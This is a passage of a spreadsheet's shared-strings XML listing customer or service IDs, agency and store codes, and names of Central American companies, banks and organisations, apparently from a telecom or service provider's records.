    <t>917757OH</t>
  </si>
  <si>
    <t>OH1000759623/AGRICENTER HONDURAS S A -</t>
  </si>
  <si>
    <t>873319OH</t>
  </si>
  <si>
    <t>361700223T</t>
  </si>
  <si>
    <t>F4524503</t>
  </si>
  <si>
    <t>F4524960</t>
  </si>
  <si>
    <t>910400070T</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_080</t>
  </si>
  <si>
    <t>47502016T</t>
  </si>
  <si>
    <t>806300063T</t>
  </si>
  <si>
    <t>F4517006</t>
  </si>
  <si>
    <t>F4519269</t>
  </si>
  <si>
    <t>876100003T</t>
  </si>
  <si>
    <t>EMPRESAS TANDY, S.A..</t>
  </si>
  <si>
    <t>668900006T</t>
  </si>
  <si>
    <t>F4522309</t>
  </si>
  <si>
    <t>F4519297</t>
  </si>
  <si>
    <t>F4525269</t>
  </si>
  <si>
    <t>F4526221</t>
  </si>
  <si>
    <t>F4517091</t>
  </si>
  <si>
    <t>F4517556</t>
  </si>
  <si>
    <t>907200001T</t>
  </si>
  <si>
    <t>MOVILIDAD DE TRANSPORTES DE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4520469</t>
  </si>
  <si>
    <t>238700007T</t>
  </si>
  <si>
    <t>F4525204</t>
  </si>
  <si>
    <t>F4525479</t>
  </si>
  <si>
    <t>F4526052</t>
  </si>
  <si>
    <t>F4526219</t>
  </si>
  <si>
    <t>833404OC</t>
  </si>
  <si>
    <t>IDG000360SV</t>
  </si>
  <si>
    <t>AUDITORES Y CONSULTORES DE NEGOCIOS S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4517558</t>
  </si>
  <si>
    <t>90001910056T</t>
  </si>
  <si>
    <t>F4519952</t>
  </si>
  <si>
    <t>425500012T</t>
  </si>
  <si>
    <t>425500036T</t>
  </si>
  <si>
    <t>333900003T</t>
  </si>
  <si>
    <t>F4518162</t>
  </si>
  <si>
    <t>F4520405</t>
  </si>
  <si>
    <t>F4521348</t>
  </si>
  <si>
    <t>F4524821</t>
  </si>
  <si>
    <t>7300115T</t>
  </si>
  <si>
    <t>25559000SV</t>
  </si>
  <si>
    <t>IMPRESOS MULTIPLES SA DE CV</t>
  </si>
  <si>
    <t>806400038T</t>
  </si>
  <si>
    <t>F4516079</t>
  </si>
  <si>
    <t>ID1037171SV</t>
  </si>
  <si>
    <t>HERNANDEZ SANCHEZ RICARDO ERNESTO</t>
  </si>
  <si>
    <t>4925889ON</t>
  </si>
  <si>
    <t>F4521990</t>
  </si>
  <si>
    <t>F4521992</t>
  </si>
  <si>
    <t>90001902540T</t>
  </si>
  <si>
    <t>F4516200</t>
  </si>
  <si>
    <t>F4518750</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0804</t>
  </si>
  <si>
    <t>F4521994</t>
  </si>
  <si>
    <t>F4524241</t>
  </si>
  <si>
    <t>1134560OH</t>
  </si>
  <si>
    <t>INVERSIONES TECNOLOGICAS EN COMUNICACIONES</t>
  </si>
  <si>
    <t>F4524963</t>
  </si>
  <si>
    <t>F4523128</t>
  </si>
  <si>
    <t>1403317OH</t>
  </si>
  <si>
    <t>F4512758</t>
  </si>
  <si>
    <t>F4512771</t>
  </si>
  <si>
    <t>20538262</t>
  </si>
  <si>
    <t>F4512790</t>
  </si>
  <si>
    <t>20558402</t>
  </si>
  <si>
    <t>F4512745</t>
  </si>
  <si>
    <t>F4512757</t>
  </si>
  <si>
    <t>F4514330</t>
  </si>
  <si>
    <t>F4512760</t>
  </si>
  <si>
    <t>20538261</t>
  </si>
  <si>
    <t>F4519846</t>
  </si>
  <si>
    <t>F4523221</t>
  </si>
  <si>
    <t>F4516349</t>
  </si>
  <si>
    <t>5246684ON</t>
  </si>
  <si>
    <t>20538265</t>
  </si>
  <si>
    <t>F4513616</t>
  </si>
  <si>
    <t>F4513258</t>
  </si>
  <si>
    <t>F4512946</t>
  </si>
  <si>
    <t>F4512794</t>
  </si>
  <si>
    <t>F4512759</t>
  </si>
  <si>
    <t>20514870</t>
  </si>
  <si>
    <t>F4518265</t>
  </si>
  <si>
    <t>629100004T</t>
  </si>
  <si>
    <t>F4521547</t>
  </si>
  <si>
    <t>ID1042020SV</t>
  </si>
  <si>
    <t>SUMINISTROS DE RESTAURANTES S.A. DE C.V.</t>
  </si>
  <si>
    <t>1655914</t>
  </si>
  <si>
    <t>F4523253</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_BARRIO_PARAISO</t>
  </si>
  <si>
    <t>873309OH</t>
  </si>
  <si>
    <t>598046OH</t>
  </si>
  <si>
    <t>OH1000562090/RECARGAS MOVILES  -</t>
  </si>
  <si>
    <t>38300691T</t>
  </si>
  <si>
    <t>F4513622</t>
  </si>
  <si>
    <t>65300031T</t>
  </si>
  <si>
    <t>321600001T</t>
  </si>
  <si>
    <t>ID1172019SV</t>
  </si>
  <si>
    <t>CONSORCIO FERRETERO DEL LITORALS.A. DE C.V.</t>
  </si>
  <si>
    <t>F4513034</t>
  </si>
  <si>
    <t>F4516709</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4048</t>
  </si>
  <si>
    <t>F4520356</t>
  </si>
  <si>
    <t>F4520580</t>
  </si>
  <si>
    <t>F4521092</t>
  </si>
  <si>
    <t>F4521718</t>
  </si>
  <si>
    <t>F4521810</t>
  </si>
  <si>
    <t>CC_GMG_SV_T054_METROCENTRO_SAN_MIGUEL</t>
  </si>
  <si>
    <t>F4523047</t>
  </si>
  <si>
    <t>F4525125</t>
  </si>
  <si>
    <t>917300007T</t>
  </si>
  <si>
    <t>F4513035</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0183</t>
  </si>
  <si>
    <t>F4518889</t>
  </si>
  <si>
    <t>F4519872</t>
  </si>
  <si>
    <t>F4520357</t>
  </si>
  <si>
    <t>F4524809</t>
  </si>
  <si>
    <t>292900627T</t>
  </si>
  <si>
    <t>489100002T</t>
  </si>
  <si>
    <t>ANTIGUA INN HOTEL S.A.</t>
  </si>
  <si>
    <t>90001909024T</t>
  </si>
  <si>
    <t>F4513037</t>
  </si>
  <si>
    <t>F4513876</t>
  </si>
  <si>
    <t>F4514019</t>
  </si>
  <si>
    <t>F4515788</t>
  </si>
  <si>
    <t>F4518034</t>
  </si>
  <si>
    <t>F4523018</t>
  </si>
  <si>
    <t>F4524287</t>
  </si>
  <si>
    <t>F4516362</t>
  </si>
  <si>
    <t>518684OH</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC000415</t>
  </si>
  <si>
    <t>F4518338</t>
  </si>
  <si>
    <t>806300447T</t>
  </si>
  <si>
    <t>22095100SV</t>
  </si>
  <si>
    <t>NEVADA AUTO PARTS SA DE CV</t>
  </si>
  <si>
    <t>F4523019</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_BARRIO_CHIAX</t>
  </si>
  <si>
    <t>1726549OH</t>
  </si>
  <si>
    <t>OH1001078268</t>
  </si>
  <si>
    <t>F4523044</t>
  </si>
  <si>
    <t>F4524083</t>
  </si>
  <si>
    <t>F4516230</t>
  </si>
  <si>
    <t>606900016T</t>
  </si>
  <si>
    <t>734351OH</t>
  </si>
  <si>
    <t>F4518241</t>
  </si>
  <si>
    <t>F4520363</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_071</t>
  </si>
  <si>
    <t>F4523020</t>
  </si>
  <si>
    <t>F4523165</t>
  </si>
  <si>
    <t>CC_BANCO_AZTECA_SV_JURIDICO</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3039</t>
  </si>
  <si>
    <t>F4517585</t>
  </si>
  <si>
    <t>22397300SV</t>
  </si>
  <si>
    <t>INDELPIN S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4516711</t>
  </si>
  <si>
    <t>427100029T</t>
  </si>
  <si>
    <t>214400004T</t>
  </si>
  <si>
    <t>F4513249</t>
  </si>
  <si>
    <t>364100040T</t>
  </si>
  <si>
    <t>F4523174</t>
  </si>
  <si>
    <t>F4523236</t>
  </si>
  <si>
    <t>F4523455</t>
  </si>
  <si>
    <t>CC_BANCO_AZTECA_SV_PUERTA_ORIENTE</t>
  </si>
  <si>
    <t>F4517586</t>
  </si>
  <si>
    <t>F4515516</t>
  </si>
  <si>
    <t>680900012T</t>
  </si>
  <si>
    <t>F4520774</t>
  </si>
  <si>
    <t>90001909424T</t>
  </si>
  <si>
    <t>938294OH</t>
  </si>
  <si>
    <t>F4523025</t>
  </si>
  <si>
    <t>400000011T</t>
  </si>
  <si>
    <t>IP2033166SV</t>
  </si>
  <si>
    <t>F4523238</t>
  </si>
  <si>
    <t>F4517587</t>
  </si>
  <si>
    <t>F4520141</t>
  </si>
  <si>
    <t>1056690OH</t>
  </si>
  <si>
    <t>3484836ON</t>
  </si>
  <si>
    <t>F4521976</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_5</t>
  </si>
  <si>
    <t>F4522509</t>
  </si>
  <si>
    <t>F4520143</t>
  </si>
  <si>
    <t>ID1383027SV</t>
  </si>
  <si>
    <t>TEXTILES OPICO S.A. DE C.V.</t>
  </si>
  <si>
    <t>518598OH</t>
  </si>
  <si>
    <t>F4517503</t>
  </si>
  <si>
    <t>F4517512</t>
  </si>
  <si>
    <t>F4520383</t>
  </si>
  <si>
    <t>F4520773</t>
  </si>
  <si>
    <t>F4521732</t>
  </si>
  <si>
    <t>F4516279</t>
  </si>
  <si>
    <t>ID1396003SV</t>
  </si>
  <si>
    <t>COMPANIA DE LOGISTICA Y TRANSPORTE S.A. DE C.V.</t>
  </si>
  <si>
    <t>ID1371002SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE JERUSALEM</t>
  </si>
  <si>
    <t>F4533324</t>
  </si>
  <si>
    <t>F4516515</t>
  </si>
  <si>
    <t>CC_BAM_GT_AGENCIA_325</t>
  </si>
  <si>
    <t>F4516592</t>
  </si>
  <si>
    <t>F4520491</t>
  </si>
  <si>
    <t>F4525843</t>
  </si>
  <si>
    <t>F4516606</t>
  </si>
  <si>
    <t>F4518405</t>
  </si>
  <si>
    <t>F4519062</t>
  </si>
  <si>
    <t>F4513717</t>
  </si>
  <si>
    <t>F4522197</t>
  </si>
  <si>
    <t>F4522229</t>
  </si>
  <si>
    <t>F4517956</t>
  </si>
  <si>
    <t>525900001T</t>
  </si>
  <si>
    <t>PRO-DESARROLLO Y AYUDA HUMANITARIA EN EL AREA URBANA Y RURAL DE GUATEM</t>
  </si>
  <si>
    <t>90001905081T</t>
  </si>
  <si>
    <t>630378OH</t>
  </si>
  <si>
    <t>F4525010</t>
  </si>
  <si>
    <t>F4518739</t>
  </si>
  <si>
    <t>F4516626</t>
  </si>
  <si>
    <t>F4518755</t>
  </si>
  <si>
    <t>F4522090</t>
  </si>
  <si>
    <t>F4525758</t>
  </si>
  <si>
    <t>90001902226T</t>
  </si>
  <si>
    <t>F4513938</t>
  </si>
  <si>
    <t>F4526186</t>
  </si>
  <si>
    <t>F4526190</t>
  </si>
  <si>
    <t>F4517092</t>
  </si>
  <si>
    <t>406400093T</t>
  </si>
  <si>
    <t>F4517095</t>
  </si>
  <si>
    <t>ID1024069SV</t>
  </si>
  <si>
    <t>ASOCIACION INSTITUCION SALESIANA</t>
  </si>
  <si>
    <t>F4520532</t>
  </si>
  <si>
    <t>F4521891</t>
  </si>
  <si>
    <t>652900017T</t>
  </si>
  <si>
    <t>F4525079</t>
  </si>
  <si>
    <t>ID1105091SV</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_785</t>
  </si>
  <si>
    <t>F4519274</t>
  </si>
  <si>
    <t>F4519959</t>
  </si>
  <si>
    <t>F4522257</t>
  </si>
  <si>
    <t>F4522258</t>
  </si>
  <si>
    <t>F4526283</t>
  </si>
  <si>
    <t>F4514899</t>
  </si>
  <si>
    <t>872600008T</t>
  </si>
  <si>
    <t>F4524840</t>
  </si>
  <si>
    <t>F4517886</t>
  </si>
  <si>
    <t>F4519974</t>
  </si>
  <si>
    <t>F4522319</t>
  </si>
  <si>
    <t>F4523033</t>
  </si>
  <si>
    <t>F4512744</t>
  </si>
  <si>
    <t>PA-MNCGMD0002M-PPA</t>
  </si>
  <si>
    <t>GRUPO MODELO-COSTA DEL ESTE</t>
  </si>
  <si>
    <t>F4521086</t>
  </si>
  <si>
    <t>F4523381</t>
  </si>
  <si>
    <t>F4515523</t>
  </si>
  <si>
    <t>F4520635</t>
  </si>
  <si>
    <t>F4520800</t>
  </si>
  <si>
    <t>774655OH</t>
  </si>
  <si>
    <t>5081393ON</t>
  </si>
  <si>
    <t>ON0000130575/BICU (BLUEFIELDS INDIAN CARIBBEAN UNIV.)-</t>
  </si>
  <si>
    <t>ID1053033SV</t>
  </si>
  <si>
    <t>473800006T</t>
  </si>
  <si>
    <t>F4513033</t>
  </si>
  <si>
    <t>IP2124083SV</t>
  </si>
  <si>
    <t>F4522162</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_CHIQUIMULILLA_023</t>
  </si>
  <si>
    <t>F4523058</t>
  </si>
  <si>
    <t>397200046T</t>
  </si>
  <si>
    <t>F4518344</t>
  </si>
  <si>
    <t>F4513630</t>
  </si>
  <si>
    <t>F4514440</t>
  </si>
  <si>
    <t>571400002T</t>
  </si>
  <si>
    <t>TECNICAS DE DESALINIZACION DE AGUAS S.A. SUCURSAL GUATEMAL</t>
  </si>
  <si>
    <t>F4522889</t>
  </si>
  <si>
    <t>F4522885</t>
  </si>
  <si>
    <t>F4523283</t>
  </si>
  <si>
    <t>F4523284</t>
  </si>
  <si>
    <t>90001910813T</t>
  </si>
  <si>
    <t>F4515482</t>
  </si>
  <si>
    <t>8600195T</t>
  </si>
  <si>
    <t>F4518836</t>
  </si>
  <si>
    <t>90001904395T</t>
  </si>
  <si>
    <t>F4520790</t>
  </si>
  <si>
    <t>F4516736</t>
  </si>
  <si>
    <t>F4514642</t>
  </si>
  <si>
    <t>47503314T</t>
  </si>
  <si>
    <t>90001905834T</t>
  </si>
  <si>
    <t>F4522697</t>
  </si>
  <si>
    <t>CC_WALMART_GT_INTERNET_Z10</t>
  </si>
  <si>
    <t>F4516648</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TORRE_INTERNACIONAL</t>
  </si>
  <si>
    <t>F4517649</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1713</t>
  </si>
  <si>
    <t>F4519920</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_SALA1015</t>
  </si>
  <si>
    <t>647200001T</t>
  </si>
  <si>
    <t>F4516865</t>
  </si>
  <si>
    <t>F4517944</t>
  </si>
  <si>
    <t>ID1374003SV</t>
  </si>
  <si>
    <t>CAJA DE CRED JUCUAPA SALOMON R.ZELAYA SOC.COOP.DE</t>
  </si>
  <si>
    <t>F4520255</t>
  </si>
  <si>
    <t>F4520254</t>
  </si>
  <si>
    <t>F4522730</t>
  </si>
  <si>
    <t>625900040T</t>
  </si>
  <si>
    <t>F4524164</t>
  </si>
  <si>
    <t>F4524165</t>
  </si>
  <si>
    <t>38300656T</t>
  </si>
  <si>
    <t>F4517652</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_JUTIAPA_SN_CATARINA_MITA</t>
  </si>
  <si>
    <t>F4521707</t>
  </si>
  <si>
    <t>F4523456</t>
  </si>
  <si>
    <t>CC_BANCO_AZTECA_SV_AHUACHAPAN_I</t>
  </si>
  <si>
    <t>F4523457</t>
  </si>
  <si>
    <t>CC_BANCO_AZTECA_SV_SONSONATE</t>
  </si>
  <si>
    <t>F4523458</t>
  </si>
  <si>
    <t>CC_BANCO_AZTECA_SV_SOYAPANGO</t>
  </si>
  <si>
    <t>F4524415</t>
  </si>
  <si>
    <t>F4523083</t>
  </si>
  <si>
    <t>F4519934</t>
  </si>
  <si>
    <t>CC_CERVECERIA_GT_AGENCIA_PLAYA_GRANDE</t>
  </si>
  <si>
    <t>F4520627</t>
  </si>
  <si>
    <t>F4523066</t>
  </si>
  <si>
    <t>F4523267</t>
  </si>
  <si>
    <t>F4519118</t>
  </si>
  <si>
    <t>F4519935</t>
  </si>
  <si>
    <t>F4520346</t>
  </si>
  <si>
    <t>F4520919</t>
  </si>
  <si>
    <t>F4521536</t>
  </si>
  <si>
    <t>5059357ON</t>
  </si>
  <si>
    <t>842700005T</t>
  </si>
  <si>
    <t>527775ON</t>
  </si>
  <si>
    <t>F4523268</t>
  </si>
  <si>
    <t>527100014T</t>
  </si>
  <si>
    <t>F4516836</t>
  </si>
  <si>
    <t>F4516907</t>
  </si>
  <si>
    <t>F4516908</t>
  </si>
  <si>
    <t>F4518262</t>
  </si>
  <si>
    <t>F4520381</t>
  </si>
  <si>
    <t>F4521539</t>
  </si>
  <si>
    <t>IP2290004SV</t>
  </si>
  <si>
    <t>IP2245017SV</t>
  </si>
  <si>
    <t>F4526070</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_428</t>
  </si>
  <si>
    <t>90001909389T</t>
  </si>
  <si>
    <t>F4526663</t>
  </si>
  <si>
    <t>F4535289</t>
  </si>
  <si>
    <t>F4526826</t>
  </si>
  <si>
    <t>22060707SV</t>
  </si>
  <si>
    <t>ESIG S.A. DE C.V.</t>
  </si>
  <si>
    <t>ID1276033SV</t>
  </si>
  <si>
    <t>SITA INFORMATION NETWORKING COMPUTING BV</t>
  </si>
  <si>
    <t>42700490T</t>
  </si>
  <si>
    <t>F4523091</t>
  </si>
  <si>
    <t>F4515326</t>
  </si>
  <si>
    <t>F4535232</t>
  </si>
  <si>
    <t>8901248T</t>
  </si>
  <si>
    <t>F4526662</t>
  </si>
  <si>
    <t>288700035T</t>
  </si>
  <si>
    <t>F4533385</t>
  </si>
  <si>
    <t>F4534183</t>
  </si>
  <si>
    <t>528417ON</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_CC_SPAZIO_Z15_VISTA_HERMOSA_III</t>
  </si>
  <si>
    <t>F4535228</t>
  </si>
  <si>
    <t>F4526507</t>
  </si>
  <si>
    <t>F4533392</t>
  </si>
  <si>
    <t>581000007T</t>
  </si>
  <si>
    <t>516814OH</t>
  </si>
  <si>
    <t>F4533389</t>
  </si>
  <si>
    <t>1010814OH</t>
  </si>
  <si>
    <t>F4526675</t>
  </si>
  <si>
    <t>25553500SV</t>
  </si>
  <si>
    <t>F4534895</t>
  </si>
  <si>
    <t>F4535286</t>
  </si>
  <si>
    <t>F4536240</t>
  </si>
  <si>
    <t>1724322OH</t>
  </si>
  <si>
    <t>OH1000924542</t>
  </si>
  <si>
    <t>5147244ON</t>
  </si>
  <si>
    <t>F4535361</t>
  </si>
  <si>
    <t>F4536244</t>
  </si>
  <si>
    <t>F4526852</t>
  </si>
  <si>
    <t>F4527305</t>
  </si>
  <si>
    <t>IP2124295SV</t>
  </si>
  <si>
    <t>INVERSIONES MELCAS, S.A DE C.V</t>
  </si>
  <si>
    <t>F4527303</t>
  </si>
  <si>
    <t>249600042T</t>
  </si>
  <si>
    <t>4980518ON</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0772</t>
  </si>
  <si>
    <t>917700003T</t>
  </si>
  <si>
    <t>F4536805</t>
  </si>
  <si>
    <t>F4536804</t>
  </si>
  <si>
    <t>F4533573</t>
  </si>
  <si>
    <t>47502804T</t>
  </si>
  <si>
    <t>F4534047</t>
  </si>
  <si>
    <t>97100186T</t>
  </si>
  <si>
    <t>F4536622</t>
  </si>
  <si>
    <t>F4529359</t>
  </si>
  <si>
    <t>3822664ON</t>
  </si>
  <si>
    <t>ON0002329812/MINISTERIO DE LA JUVENTUD-</t>
  </si>
  <si>
    <t>292900127T</t>
  </si>
  <si>
    <t>F4534807</t>
  </si>
  <si>
    <t>586400001T</t>
  </si>
  <si>
    <t>F4525983</t>
  </si>
  <si>
    <t>23473800SV</t>
  </si>
  <si>
    <t>AGCO SA DE CV</t>
  </si>
  <si>
    <t>1610397OH</t>
  </si>
  <si>
    <t>ESPRESSO AMERICANO</t>
  </si>
  <si>
    <t>F4536504</t>
  </si>
  <si>
    <t>829800060T</t>
  </si>
  <si>
    <t>F4535728</t>
  </si>
  <si>
    <t>8200050T</t>
  </si>
  <si>
    <t>IDG000461SV</t>
  </si>
  <si>
    <t>GUILLERMO ERNESTO MIGUEL BAHAIA</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_027</t>
  </si>
  <si>
    <t>1606010OH</t>
  </si>
  <si>
    <t>FUNDACIÓN COMUNITARIA SAN MARTÍN</t>
  </si>
  <si>
    <t>CONTR0001196908OC</t>
  </si>
  <si>
    <t>IDG000063SV</t>
  </si>
  <si>
    <t>AFP CRECER S.A.</t>
  </si>
  <si>
    <t>IDG002398SV</t>
  </si>
  <si>
    <t>SORTO GARCIA RHINA EUCEBIA</t>
  </si>
  <si>
    <t>F4527570</t>
  </si>
  <si>
    <t>F4527451</t>
  </si>
  <si>
    <t>3538920ON</t>
  </si>
  <si>
    <t>F4527138</t>
  </si>
  <si>
    <t>F4526993</t>
  </si>
  <si>
    <t>F4528031</t>
  </si>
  <si>
    <t>F4528071</t>
  </si>
  <si>
    <t>CC_WALMART_SV_DF_EL_TRANSITO_SAN_MIGUEL</t>
  </si>
  <si>
    <t>IP2037228SV</t>
  </si>
  <si>
    <t>F4528914</t>
  </si>
  <si>
    <t>F4528949</t>
  </si>
  <si>
    <t>F4528951</t>
  </si>
  <si>
    <t>F4528953</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_MISION_HOME_QUETZALTENANGO</t>
  </si>
  <si>
    <t>F4532101</t>
  </si>
  <si>
    <t>938800001T</t>
  </si>
  <si>
    <t>VIAJES EUROAMERICA INTERNACIONAL S.A.</t>
  </si>
  <si>
    <t>F4532100</t>
  </si>
  <si>
    <t>1577264OH</t>
  </si>
  <si>
    <t>TUBELITE SA</t>
  </si>
  <si>
    <t>F4532641</t>
  </si>
  <si>
    <t>90001908970T</t>
  </si>
  <si>
    <t>22344200SV</t>
  </si>
  <si>
    <t>BANCO CUSCATLAN SV, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4532645</t>
  </si>
  <si>
    <t>625900030T</t>
  </si>
  <si>
    <t>F4532502</t>
  </si>
  <si>
    <t>F4532504</t>
  </si>
  <si>
    <t>F4533907</t>
  </si>
  <si>
    <t>F4533909</t>
  </si>
  <si>
    <t>ID1129056SV</t>
  </si>
  <si>
    <t>ASOTRA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4533741</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_VILLA_CANALES</t>
  </si>
  <si>
    <t>F4533812</t>
  </si>
  <si>
    <t>F4533816</t>
  </si>
  <si>
    <t>F4533811</t>
  </si>
  <si>
    <t>25936500SV</t>
  </si>
  <si>
    <t>FISCALIA GENERAL DE LA REPUBLICA</t>
  </si>
  <si>
    <t>F4533817</t>
  </si>
  <si>
    <t>CC_BANCO_AGRICOLA_SV_AGENCIA_LA_MERCED</t>
  </si>
  <si>
    <t>F4534618</t>
  </si>
  <si>
    <t>F4534617</t>
  </si>
  <si>
    <t>863400205T</t>
  </si>
  <si>
    <t>F4534596</t>
  </si>
  <si>
    <t>F4534595</t>
  </si>
  <si>
    <t>7900356T</t>
  </si>
  <si>
    <t>F4529296</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0044</t>
  </si>
  <si>
    <t>607867ON</t>
  </si>
  <si>
    <t>F4536112</t>
  </si>
  <si>
    <t>F4536110</t>
  </si>
  <si>
    <t>1510519OH</t>
  </si>
  <si>
    <t>FANASA A DE RL DE CV</t>
  </si>
  <si>
    <t>3355877ON</t>
  </si>
  <si>
    <t>F4527931</t>
  </si>
  <si>
    <t>F4530051</t>
  </si>
  <si>
    <t>F4534517</t>
  </si>
  <si>
    <t>F4534522</t>
  </si>
  <si>
    <t>8900622T</t>
  </si>
  <si>
    <t>F4530145</t>
  </si>
  <si>
    <t>630100001T</t>
  </si>
  <si>
    <t>CEFRIC (XT)</t>
  </si>
  <si>
    <t>F4531470</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1278</t>
  </si>
  <si>
    <t>F4537830</t>
  </si>
  <si>
    <t>F4535045</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0624</t>
  </si>
  <si>
    <t>F4532963</t>
  </si>
  <si>
    <t>BANCO ABANK,SOCIEDAD ANONIMA.</t>
  </si>
  <si>
    <t>IP2099099SV</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C146</t>
  </si>
  <si>
    <t>90001910482T</t>
  </si>
  <si>
    <t>F4536261</t>
  </si>
  <si>
    <t>F4529399</t>
  </si>
  <si>
    <t>F4529401</t>
  </si>
  <si>
    <t>265900399T</t>
  </si>
  <si>
    <t>F4530255</t>
  </si>
  <si>
    <t>CONTR0001427828OC</t>
  </si>
  <si>
    <t>93900009T</t>
  </si>
  <si>
    <t>ORAZUL ENERGY GUATEMALA Y CIA. S.C.A.</t>
  </si>
  <si>
    <t>F4536122</t>
  </si>
  <si>
    <t>F4536637</t>
  </si>
  <si>
    <t>F4536546</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4056</t>
  </si>
  <si>
    <t>F4536641</t>
  </si>
  <si>
    <t>F4527467</t>
  </si>
  <si>
    <t>F4528958</t>
  </si>
  <si>
    <t>F4532701</t>
  </si>
  <si>
    <t>F4533576</t>
  </si>
  <si>
    <t>F4533577</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0160</t>
  </si>
  <si>
    <t>ID1026186SV</t>
  </si>
  <si>
    <t>IP2094060SV</t>
  </si>
  <si>
    <t>25216300SV</t>
  </si>
  <si>
    <t>ID1035016SV</t>
  </si>
  <si>
    <t>F4536540</t>
  </si>
  <si>
    <t>7800426T</t>
  </si>
  <si>
    <t>F4531540</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0588</t>
  </si>
  <si>
    <t>F4534926</t>
  </si>
  <si>
    <t>F4534841</t>
  </si>
  <si>
    <t>807900405T</t>
  </si>
  <si>
    <t>F4536729</t>
  </si>
  <si>
    <t>344400273T</t>
  </si>
  <si>
    <t>F4529402</t>
  </si>
  <si>
    <t>453813ON</t>
  </si>
  <si>
    <t>CONTR0001515036OC</t>
  </si>
  <si>
    <t>F4528326</t>
  </si>
  <si>
    <t>625900228T</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C146</t>
  </si>
  <si>
    <t>F4537337</t>
  </si>
  <si>
    <t>F4528166</t>
  </si>
  <si>
    <t>F4532668</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_VILLA_CANALES</t>
  </si>
  <si>
    <t>ID1051004SV</t>
  </si>
  <si>
    <t>CONTR0001564854OC</t>
  </si>
  <si>
    <t>FH3013</t>
  </si>
  <si>
    <t>F4535583</t>
  </si>
  <si>
    <t>IPG000077SV</t>
  </si>
  <si>
    <t>777129OH</t>
  </si>
  <si>
    <t>OH1000675017/DALILA S DE R L -</t>
  </si>
  <si>
    <t>MP231101127SSV</t>
  </si>
  <si>
    <t>47501017T</t>
  </si>
  <si>
    <t>IP2085019SV</t>
  </si>
  <si>
    <t>5406137ON</t>
  </si>
  <si>
    <t>937272OH</t>
  </si>
  <si>
    <t>F4527229</t>
  </si>
  <si>
    <t>254100044T</t>
  </si>
  <si>
    <t>F4527511</t>
  </si>
  <si>
    <t>8200211T</t>
  </si>
  <si>
    <t>F4530993</t>
  </si>
  <si>
    <t>F4528282</t>
  </si>
  <si>
    <t>F4529346</t>
  </si>
  <si>
    <t>F4532666</t>
  </si>
  <si>
    <t>F4532935</t>
  </si>
  <si>
    <t>F4534838</t>
  </si>
  <si>
    <t>F4536874</t>
  </si>
  <si>
    <t>F4532855</t>
  </si>
  <si>
    <t>F4528204</t>
  </si>
  <si>
    <t>F4533265</t>
  </si>
  <si>
    <t>F4533261</t>
  </si>
  <si>
    <t>F4536273</t>
  </si>
  <si>
    <t>F4536279</t>
  </si>
  <si>
    <t>F4537347</t>
  </si>
  <si>
    <t>334900008T</t>
  </si>
  <si>
    <t>4666519ON</t>
  </si>
  <si>
    <t>IPG003911SV</t>
  </si>
  <si>
    <t>CRECE CENTRO AMERICA, S.A. DE C.V</t>
  </si>
  <si>
    <t>90001907104T</t>
  </si>
  <si>
    <t>825400001T</t>
  </si>
  <si>
    <t>INVERSIONES RECAJ, S.A.</t>
  </si>
  <si>
    <t>86100066T</t>
  </si>
  <si>
    <t>F4530093</t>
  </si>
  <si>
    <t>ID1050041SV</t>
  </si>
  <si>
    <t>SUPLIDORES DIVERSOS SA DE CV</t>
  </si>
  <si>
    <t>F4532459</t>
  </si>
  <si>
    <t>F4532611</t>
  </si>
  <si>
    <t>F4532697</t>
  </si>
  <si>
    <t>5355392ON</t>
  </si>
  <si>
    <t>ON0002472547/ENSAMBLADORA NICARAGUENSE DE MOTOCICLETASS.A.</t>
  </si>
  <si>
    <t>F4537622</t>
  </si>
  <si>
    <t>F4531219</t>
  </si>
  <si>
    <t>F4530135</t>
  </si>
  <si>
    <t>292900113T</t>
  </si>
  <si>
    <t>758500252T</t>
  </si>
  <si>
    <t>427100032T</t>
  </si>
  <si>
    <t>22505700SV</t>
  </si>
  <si>
    <t>COMPAÑIA SALVADOREÑA DE TELESERVICIOS S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4537750</t>
  </si>
  <si>
    <t>F4537678</t>
  </si>
  <si>
    <t>IP2141018SV</t>
  </si>
  <si>
    <t>F4532699</t>
  </si>
  <si>
    <t>IP2027079SV</t>
  </si>
  <si>
    <t>INVERSIONES DAGEL SA DE CV</t>
  </si>
  <si>
    <t>331100002T</t>
  </si>
  <si>
